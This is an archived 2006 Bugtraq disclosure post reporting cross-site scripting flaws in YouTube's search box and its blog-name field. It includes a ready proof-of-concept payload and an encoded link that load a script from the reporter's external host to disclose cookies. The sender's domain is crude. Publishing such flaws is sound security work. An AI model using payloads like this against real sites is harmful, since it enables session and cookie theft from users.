lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060616090349.23042.qmail@securityfocus.com>
Date: 16 Jun 2006 09:03:49 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Youtube.com - XSS & cookie disclosure


Youtube.com

Homepage:
http://www.youtube.com

Affected files:

* Search box input
* Adding a new blog:
- Blog name


XSS Vuln with cookie disclosure via search box:

Data isn't sanatized when using the search box. For PoC input:

<script src=http://www.youfucktard.com/xss.js></script>

PoC link:
http://www.youtube.com/results?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E&search_type=search_videos&search=Search

Screenshots:
http://www.youfucktard.com/xsp/youtube1.jpg
------------------------------------------

XSS vuln via blog name input box:

Now, you tube allows you to add a blog to your profile, and one of the places they let you merge a blog is from blogspot.com. I auditing them a few days ago, and since you can use html in your blogs name amongst other things, this is dangerous for bringing it into youtube.

Screenshots:

http://www.youfucktard.com/xsp/youtube1.jpg
http://www.youfucktard.com/xsp/youtube2.jpg
http://www.youfucktard.com/xsp/youtube3.jpg


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ